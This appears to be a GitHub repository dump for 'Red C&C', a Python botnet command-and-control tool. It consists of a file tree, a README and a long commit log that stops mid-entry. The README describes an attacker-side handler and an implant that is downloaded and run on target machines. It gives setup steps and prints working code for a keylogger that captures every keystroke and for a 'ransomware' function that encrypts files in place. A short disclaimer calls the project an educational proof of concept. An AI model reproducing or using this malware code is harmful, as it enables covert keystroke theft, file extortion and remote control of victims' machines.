======================: FILES :======================
Red-C-C
├── LICENSE
├── README.md
└── scripts
    ├── install
    │   ├── install.sh
    │   └── README.md
    └── net
        ├── backups
        │   ├── cc.py.bak
        │   └── ss.py.bak
        ├── cc.py
        └── ss.py

4 directories, 8 files
======================: README CONTENT :======================
```
				██████╗ ███████╗██████╗  	██████╗   ██╗    ██████╗
				██╔══██╗██╔════╝██╔══██╗	██╔════╝   ██║   ██╔════╝
				██████╔╝█████╗  ██║  ██║	██║     ████████╗██║     
				██╔══██╗██╔══╝  ██║  ██║	██║     ██╔═██╔═╝██║     
				██║  ██║███████╗██████╔╝	╚██████╗██████║  ╚██████╗
				╚═╝  ╚═╝╚══════╝╚═════╝  	╚═════╝╚═════╝   ╚═════╝
```                                            
Red C&C is a program focused on commanding and controlling a botnet. Red C&C consists of two scripts: one that will be executed by the attacker and one that will be downloaded and executed on the target machines. Red C&C will allow an attacker to send terminal commands to an entire botnet through a single interface using a single command. The purpose of Red C&C is to simplify the communication between an attacker and the machines that they have compromised. Red C&C uses two of Python's built-in modules for most of the heavy lifting: the **Socket** module for establishing a client-server communication between the attacker and the target machines, and the **Threading** module for dividing the two main functions of the program into two seperate threads. Modifications to the Windows portion of the program are still being made.

#### **Note**: Red C&C was created as a PoC and should not be used for malicious intent but for educational purposes.

### Installing Red C&C
#### Remember to change the IP address in both ss.py and cc.py to your IP address!
`IP = "Your IP address"`
```
# Install Git if its not installed.
apt install git

# Clone this repository to a folder of your choosing.
git clone https://github.com/binexisHATT/Red-C-C.git

# Change directory into the programs folder.
cd Red-C-C/

# Running the handler.
./ss.py

----------------------------------
Or you can create a symbolic link:

path = The path to the folder you cloned Red C&C in.
ln path/Red-C-C/scripts/net/ss.py /bin/redcc

With this symbolic link, typing "redcc" will execute the handler anywhere in the command line.

# Running the handler with symbolic link.
redcc
```

# Some of Red C&C's Highlights
### Built-in Keylogger
```python
def on_press(key):
	global LOG
	try:
		LOG += str(key.char)
	except AttributeError:
		if key == key.space:
			LOG += ' '
		elif key == key.enter: LOG += '\n'
		elif key == key.backspace: LOG += '' 
		elif key == key.ctrl: LOG += ' ctrl+'
		elif key == key.tab: LOG += '\t'
		elif key == key.cmd: LOG += ' cmd+'
		elif key == key.alt: LOG += ' alt+'
		elif key == key.caps_lock: LOG += ' CapsLock '
		elif key == key.delete: LOG += ' Del '
		elif key == key.down: LOG += ' DownArrow '
		elif key == key.left: LOG += ' LeftArrow '
		elif key == key.up: LOG += ' UpArrow '
		elif key == key.right: LOG += ' RightArrow'
		elif key == key.esc: LOG += ' esc '
		elif key == key.home: LOG += ' HomeKey '
		elif key == key.insert: LOG += ' InsertKey '
		elif key == key.print_screen: LOG += ' PrintScreen '
		elif key == key.shift: LOG += ' shift+'
		elif key == key.f1: LOG += ' F1 '
		elif key == key.f2: LOG += ' F2 '
		elif key == key.f3: LOG += ' F3 '
		elif key == key.f4: LOG += ' F4 '
		elif key == key.f5: LOG += ' F5 '
		elif key == key.f6: LOG += ' F6 '
		elif key == key.f7: LOG += ' F7 '
		elif key == key.f8: LOG += ' F8 '
		elif key == key.f9: LOG += ' F9 '
		elif key == key.f10: LOG += ' F10 '
		elif key == key.f11: LOG += ' F11 '
		elif key == key.f12: LOG += ' F12 '
		else:
			LOG += str(key)
def keylogger():
	listener = keyboard.Listener(on_press=on_press)
	try:
		if SYSTEM == 'Linux':
			os.mkdir(LIN_DIR)
		else:
			os.mkdir(WIN_DIR)
		log_to_file()
		listener.start()
	except OSError:
		pass
```
### Built-in Rasonware Operations
```python
def crypto(action: str, *args):
	if action == 'encrypt':
		to_encrypt = args[0]
		with open(to_encrypt, 'wb+') as f:
			data = f.read()
			key = Fernet.generate_key()
			cipher = Fernet(key)
			cipher_text = cipher.encrypt(data)
			f.seek(0)
			f.write(cipher_text)
			f.truncate()
			return f'  Save the decryption key -> {key.decode()}'
	else:
		to_encrypt, key = args[0][0], args[0][1]
		with open(to_encrypt, 'wb+') as f:
			cipher_text = f.read()
			cipher = Fernet(key)
			try:
				plain_text = cipher.decrypt(cipher_text)
			except cryptography.fernet.InvalidToken:
				return '  [-] Invalid key!'
			f.seek(0)
			f.write(plain_text)
			f.truncate()
			return '  [+] File successfully decrypted!'
```

### Project Video --> [redcc](https://www.youtube.com/watch?v=oUrBTU-7KGc&list=PLx0iOsdUOUmm0Z9vWB5iIGAMZpiRIGA0z&index=3)
====================== GIT HISTORY: ======================
709965a HEAD@{0}: clone: from https://github.com/bin3xish477/Red-C-C
commit 709965a4ecc76629e63035977c59dc5eca98443b
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 19 16:28:00 2020 -0400

    Update README.md

commit ececcd1ad46d7ad79c3f0ccdebe641d14225af91
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 19 16:27:24 2020 -0400

    Update README.md

commit ba79e97bfc6c8a76377f0963c62fa941a14b1fb8
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 14 12:37:32 2020 -0400

    Update README.md

commit d6e8c1223a220a3c2f32630229cdf4af53dcbdfa
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 22:26:14 2020 -0400

    Update cc.py

commit 47c07541a7b6a373eb71c98fe9bef48b87b59c54
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 22:25:37 2020 -0400

    Update ss.py

commit 1e72bf7002b644d89f1e7912554d8fdb62b7a62e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 22:22:59 2020 -0400

    Update ss.py

commit 9960fcc7d92801eb46864c6d8e9ca2627aa09d94
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 22:22:31 2020 -0400

    Update cc.py

commit c016a54804d3e9881e85519b2bdddc14e7a818b3
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 22:22:08 2020 -0400

    Delete .ss.py.swp

commit f6dece50e8876fd10e2f7f983b95b1d6234412cb
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 17:38:34 2020 -0400

    Update README.md

commit c65ce2ca86e05b402525ee8d45a6fff20c494a7a
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 13 17:35:32 2020 -0400

    updating repo

commit 9072f3a1d1b09cf3b8c33b9f165f09f57f5dc111
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 13 13:22:04 2020 -0400

    updating repository

commit 916ec82f19e3b0247134b84cdcf3c4f9db791b55
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:19:08 2020 -0400

    Update README.md

commit 7644b38543f8c48175201157d31b6af6bda358fd
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:18:34 2020 -0400

    Update README.md

commit 7ff8c9156604bfe70c2ec12dddd85c7f0c7dad4f
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:18:02 2020 -0400

    Update README.md

commit ca88b3ac4572b346329f20bc7b2860723e125114
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:17:01 2020 -0400

    Update README.md

commit 9b66b79bacb6c24b4c862e2f172f06eaef7c3dd4
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:16:30 2020 -0400

    Update README.md

commit 87330f7d34a2a949fef073e9f4b8f78e2db61675
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 13 13:14:34 2020 -0400

    updating repository

commit a60e208b52a88479a1dc87e44fe034ac64f6137a
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:09:13 2020 -0400

    Update cc.py

commit a87e8df0c22e8855c55074b9dd6bec325fe1c80e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:07:40 2020 -0400

    Update README.md

commit 10ee54e4fa1006f5fe1e7d43a8c6244860a09794
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:07:20 2020 -0400

    Update README.md

commit 561ae178cb5d32547e0f93ee7925ec8d1968fd5c
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:06:06 2020 -0400

    Update README.md

commit 78c2167c6009a5c89d5d2d65a5277e63ce5c8c7d
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:05:42 2020 -0400

    Update README.md

commit c7b23855a025b931c18bdb476959133daba3c6a4
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:05:07 2020 -0400

    Update README.md

commit dee176170bc71564ea0567f960b0057d40ffcb32
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 13:04:34 2020 -0400

    Update README.md

commit f0ac2fd05f15cd131927747125d5f134aefbeac0
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 12:06:06 2020 -0400

    Update README.md

commit d30eba07eb1146b85e16b61cd2b7979886c35d63
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 12:05:45 2020 -0400

    Update README.md

commit d4f16694c49443c9708c2197db50228bbc637266
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:44:41 2020 -0400

    Update cc.py

commit 95a44923d07dfe7373a1e90d13b7fa9a31c3ce50
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:43:01 2020 -0400

    Update README.md

commit 6541c5c15c737cc08d28938debeea5819573ce34
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:42:31 2020 -0400

    Update README.md

commit f28f3a04d1dfe0f2a7eb05b8f0ba36705a04de63
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:42:14 2020 -0400

    Update README.md

commit 73433bed7e0ee4ea62b34db28c6269ea170070cd
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:41:58 2020 -0400

    Update README.md

commit 13b89170962fef6ec6904ce227e830e177353904
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:41:06 2020 -0400

    Update README.md

commit c381a983c17649a91c964e5842cfa4ca5223b2ce
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:40:49 2020 -0400

    Update README.md

commit 96406dcd66708e2c414eeb93de201cbb5102211b
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:40:21 2020 -0400

    Update README.md

commit 3dce554d81828b3058e192354272e670f84af2be
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:38:35 2020 -0400

    Update README.md

commit 917d44522178931c718a9b37be7aab4193683d32
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:37:20 2020 -0400

    Update README.md

commit daa95c4009bec3c7279ff5c62a7df57b673ffa9f
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:37:00 2020 -0400

    Update README.md

commit 5511bf345821e92658196fd2abb3d2e245a0aace
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:36:41 2020 -0400

    Update README.md

commit a375a3c0d3e38af00412be910395c7d2f8937c19
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:36:32 2020 -0400

    Update README.md

commit bdf6c30f361f33394ee1699ccb4a608e2b25e82d
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:36:20 2020 -0400

    Update README.md

commit ad1983750275600ce7f299168219c003de2d1915
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:35:59 2020 -0400

    Update README.md

commit 882dc0dad2d6b8912d2f85c5dc68be25471ccb5c
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:34:24 2020 -0400

    Update README.md

commit 0e45a29e01ba8e32a14569f1ceeea552cf76954b
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:34:02 2020 -0400

    Update README.md

commit c84f8be078f6e2470d348c01c5e31ffd2a7613e5
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:30:10 2020 -0400

    Update README.md

commit 22d3068dce982b28f3bf2aaf5bf353a468199c18
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:29:09 2020 -0400

    Update README.md

commit f7243b994c3999d96a18255b9062ca81f17bd228
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:28:51 2020 -0400

    Update README.md

commit fb0374a51994df1adc3194fff8a054f79efdf068
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 11:22:55 2020 -0400

    Update README.md

commit 314f68bf8d5073adf65c16a7912f43d5c1b74f30
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 11:10:39 2020 -0400

    Update README.md

commit e7b781ca8d97821b3b0eaf442984bc70fd3d94a4
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 11:10:16 2020 -0400

    Update README.md

commit 38d10a01ca1d31d8789d54bbb353dcbca28db82f
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 11:09:53 2020 -0400

    Update README.md

commit 6d934bded7281f8576a4dbe202d96b5a7280d730
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 13 11:09:20 2020 -0400

    Update README.md

commit 1e7937ddd489a94d06a5e3cd4bed04b789995add
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 10:57:56 2020 -0400

    Update README.md

commit 30bc8a0633c553b1e6ef1faaa358dafa421ec35f
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 10:26:46 2020 -0400

    Update README.md

commit 0c4e8f1fe5148d9f8fc1cf06ceb94c801785c13a
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 13 10:24:12 2020 -0400

    Update README.md

commit 09dbb3c2eb7ba04dfb6488505d8a7aa57f51be53
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 14:39:00 2020 -0400

    Rename scripts/net/ss.py.bak to scripts/net/backups/ss.py.bak

commit e1eb9424c367f25297fe632c24d3944b7605236e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 14:38:44 2020 -0400

    Rename scripts/net/cc.py.bak to scripts/net/backups/cc.py.bak

commit b0f2393ad5fa490e1b2b1560323768e7783defa1
Merge: df32203 3527e17
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:36:55 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Red-C-C

commit df32203fa35e6e7ec93ebf266b5541b275bba9cc
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:36:46 2020 -0700

    updating repo

commit bc111f5c5447af6418c88cad3210a81c44b1229e
Merge: 93aae58 e5ead05
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:34:04 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Red-C-C

commit 93aae58d2f70fee7583b7d1b6b55936222b00f19
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:33:52 2020 -0700

    updating repo

commit d4b29ea3c2bf394a39053437806bca909c010a6b
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:32:45 2020 -0700

    updating repo

commit 2b4a9d963244360ce12d8996489db354e0054cc2
Merge: 2723f50 87f5a18
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:15:11 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Red-C-C

commit 2723f500ecb903f1914a410a00cbc9ca205eacbc
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 14:14:32 2020 -0700

    updating repo

commit 3527e1705976fb1e254da2b5227d6cd1fac442c8
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 14:36:18 2020 -0400

    Update README.md

commit aed4406d3cd85a96bcca5170b131205394dfffad
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 14:35:58 2020 -0400

    Update README.md

commit a83c613214e3a4172177ef3a759c4fa6e8ca8212
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 14:35:40 2020 -0400

    Update README.md

commit e5ead0592a827522692846c9e2fc8ec4cada943a
Author: Chris <ckortbaoui@gmail.com>
Date:   Sun Apr 12 14:33:01 2020 -0400

    Update README.md

commit 2f85d983b069ed4a868e2d6431f83f1ee0958356
Merge: 02754cb 599bdda
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 00:18:08 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Red-C-C

commit 02754cb24fc2b469a9136e4647c777d9d9e7d47b
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 00:17:52 2020 -0700

    updating repo

commit e7c03cf6895af0e7c75e76793674027835543ca6
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sun Apr 12 00:15:01 2020 -0700

    updating repo

commit 87f5a1856e52377e036fffca70fcb0a8b3d50baa
Author: Chris <ckortbaoui@gmail.com>
Date:   Sun Apr 12 00:22:00 2020 -0400

    Update install.sh

commit 599bdda82d297093b46e67e32886c850253e0108
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sun Apr 12 00:16:29 2020 -0400

    Add files via upload

commit 6fb75553fafd454b776f5ee6276116c427d0f73a
Author: Chris <ckortbaoui@gmail.com>
Date:   Sat Apr 11 22:52:53 2020 -0400

    Update install.sh

commit 3fe3bb185b408a59ec737915e85d87b2ff8130d2
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 14:32:45 2020 -0700

    Update ss.py

commit 4fff5c426da8532466c0ee1e47b4088c0a670b17
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sat Apr 11 17:30:08 2020 -0700

    Updating repository

commit e3628b516e82dc51af18807f87f2f3162ccc11c3
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 14:27:58 2020 -0700

    Delete ss.py.bak

commit e2cd327e819fa4a1c4209657728a261232fbd93a
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 14:27:51 2020 -0700

    Delete cc.py.bak

commit 2a9a17e049d3f81a7c2b822d233dd27943f4bc93
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 17:27:05 2020 -0400

    Add files via upload

commit 183d3fac4d3ac263a3e0447b69624f0c5fde17ce
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:42:43 2020 -0700

    Update README.md

commit 9851d398f2ffa69c5982dd9a33fd3ad8d088ba03
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:41:00 2020 -0700

    Update README.md

commit 3216685e0019334fd6d7b612eda86f765625b77c
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:39:06 2020 -0700

    Update README.md

commit 24d61d8b5d467176271c3a5298c449dcb934cbea
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:38:15 2020 -0700

    Update README.md

commit 98857d1fa6e1e32fb09af7561cc12bf1915f40ff
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:36:26 2020 -0700

    Update README.md

commit bbc5b9fc9a8c1728bc548f3d1348349433ec8bdf
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:35:58 2020 -0700

    Update README.md

commit 9fa5cc287dd0d2ca7671ff927e9df6761ee5c633
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:34:50 2020 -0700

    Update README.md

commit 316ac0a203b2c664241966a9b950bca5f578a391
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:34:26 2020 -0700

    Update README.md

commit 838b60b03a0e29c0ffd282e763653e1559c709ed
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:33:33 2020 -0700

    Update README.md

commit 1b1638310b766298fd397782b09727ede22fdd05
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:27:09 2020 -0700

    Create README.md

commit 14609d7542fad6e0efa56436ce8b0457c07d681e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:24:34 2020 -0700

    Update install.sh

commit e4a80ab24ae2f7e9b090e73090bc2e797c56888b
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Sat Apr 11 13:18:27 2020 -0700

    Delete install.ps1

commit b0133c1a5282178aefb4840ac5ca6d2d45683243
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sat Apr 11 16:16:25 2020 -0700

    updating repo

commit 882e9002e78c811748f89db653c07b762ef520f3
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sat Apr 11 12:26:02 2020 -0700

    updating repo

commit 7ee9f645f896164bdd5879e8ceaf5cee3918df33
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Sat Apr 11 12:22:07 2020 -0700

    updating repo

commit 31c1333aa742ed75ef64880cca3f6785084e4f5b
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 21:16:48 2020 -0700

    Updating repository

commit 249a724ad864003db8df5fe336af604f1737ff65
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 21:14:55 2020 -0700

    Updating repository

commit 0efa037bb2d3c8a4aa1761c13c6f8cbf80f6cdd7
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 17:08:27 2020 -0700

    updating repo

commit 19d736a85171547a4bbb0b57a0324f88359b1594
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 17:07:15 2020 -0700

    updating repo

commit f57b7ac9573c05d2548de25ae9321f7edcbf5fd1
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 17:03:31 2020 -0700

    updating repo

commit d4907a2fcfd44e73ded2c92f8b500bd500aaef15
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 16:55:12 2020 -0700

    updating repo

commit f6d3276b5675e89c892b0e6e3eafd756c188e475
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Fri Apr 10 13:14:21 2020 -0700

    updating repo

commit 04228e9178457221217e1d42830c4e62e6a0e2d7
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Thu Apr 9 23:31:29 2020 -0400

    Update README.md

commit b5d4e2acec6ca6dbe55023cfa967300b27e9f265
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Thu Apr 9 23:28:46 2020 -0400

    Delete install.sh

commit 46a3ad3e064ddcdbd569bec980ba0f85e8088e83
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Thu Apr 9 23:17:45 2020 -0700

    updating repo

commit 599c742eef518b233a62c7a3eccfa0748021bd7a
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Thu Apr 9 20:27:42 2020 -0700

    updating repo

commit d5a5f472af6e8b44afa9624f6680e11c0314a44d
Merge: db6c827 fab0115
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Thu Apr 9 20:25:43 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Botnet-Command-Control

commit db6c8276c98bcd1cd000a21dba06e4bf89d7f9fc
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Thu Apr 9 20:20:57 2020 -0700

    updating repo

commit fab01154693ff0a1f0d44b08d25f3c9aa9f5e685
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Thu Apr 9 17:55:40 2020 -0400

    Delete file_encrypt.py

commit 27cbf0e5f97098c2cf8248dc45a4725e593a9734
Author: Chris <ckortbaoui@gmail.com>
Date:   Thu Apr 9 16:22:34 2020 -0400

    Create file_encrypt.py

commit 318d2a162c71f906886332f85713b17913ceb630
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 19:28:52 2020 -0700

    updating repo

commit 03e3d73485675e6ef0f62a11d80def029ec99584
Author: Chris <ckortbaoui@gmail.com>
Date:   Wed Apr 8 15:15:20 2020 -0400

    Update ss.py
    
    added comments

commit 80154d91aabdc0573a82fefd30508833b9b7e96d
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 14:55:29 2020 -0700

    updating repo

commit 2190ed449770b637a2c3296cff2d176312263ea0
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 14:53:27 2020 -0700

    updating repo

commit a6233160dfe8e36d94e63c0838985ad4ef5dde7c
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 13:08:42 2020 -0700

    updating repo

commit c077386a5f2da1b8690b8917d0368603681f8e2a
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 12:11:21 2020 -0700

    updating repo

commit 95b249bccbd40751e1bd517306c1d0cfdb737237
Merge: e955447 37ff40d
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 01:45:49 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Botnet-Command-Control

commit e9554476740c53c1943ee6eb0f1b7572f230aebd
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Wed Apr 8 01:45:04 2020 -0700

    updating repo

commit 62a1e6165081dc584e5916b5f264f4d02c5359e9
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 22:17:00 2020 -0700

    updating repo

commit cb73004cad0fe3d7320d3b60c543b874a8ae5c5b
Merge: 9aef39e 43f9b44
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 22:15:56 2020 -0700

    updating repo

commit 9aef39e7840e2030ee94f3d52a1627abba338349
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 22:13:05 2020 -0700

    updating repo

commit 0ec9de10db07a61642e1a9c02a13cde8e007e5e6
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 22:11:03 2020 -0700

    updating repo

commit 37ff40d75c08db95a8ccc6c6c9bbc2652acc4d76
Author: Chris <ckortbaoui@gmail.com>
Date:   Tue Apr 7 22:41:53 2020 -0400

    Create ss2.py

commit 4936eed37b532fa1bce3d003db605d81084ab339
Merge: 5a681fb b2c184f
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 16:10:13 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Botnet-Command-Control

commit 5a681fb7d106e9cfd336989bf0b08adf1bd4807b
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 16:09:12 2020 -0700

    updating repo

commit acbc09856040f293da5821424a69622b5fae6f12
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 15:19:43 2020 -0700

    updating repo

commit f57b7ae95f5b45b4693e96a5e6fdf11be4f2771c
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 14:25:33 2020 -0700

    updating repo

commit 43f9b448292861634d72f6d76aa7d2c226931504
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 17:19:28 2020 -0400

    Update cc.py

commit d12452c4439ee41f18288d8a3c3097d7ec631b1c
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 14:09:55 2020 -0700

    updating repo

commit b2c184ffb77f78e9654189e809570c0759219ad2
Author: Chris <ckortbaoui@gmail.com>
Date:   Tue Apr 7 15:57:27 2020 -0400

    Update install.sh

commit eeb858852cc8be7560b6ab276814ccbbf10fb58f
Author: Chris <ckortbaoui@gmail.com>
Date:   Tue Apr 7 15:44:49 2020 -0400

    Update install.sh

commit 667e44d68d1f03f6333c1a005e0c1824658f9bf0
Author: Chris <ckortbaoui@gmail.com>
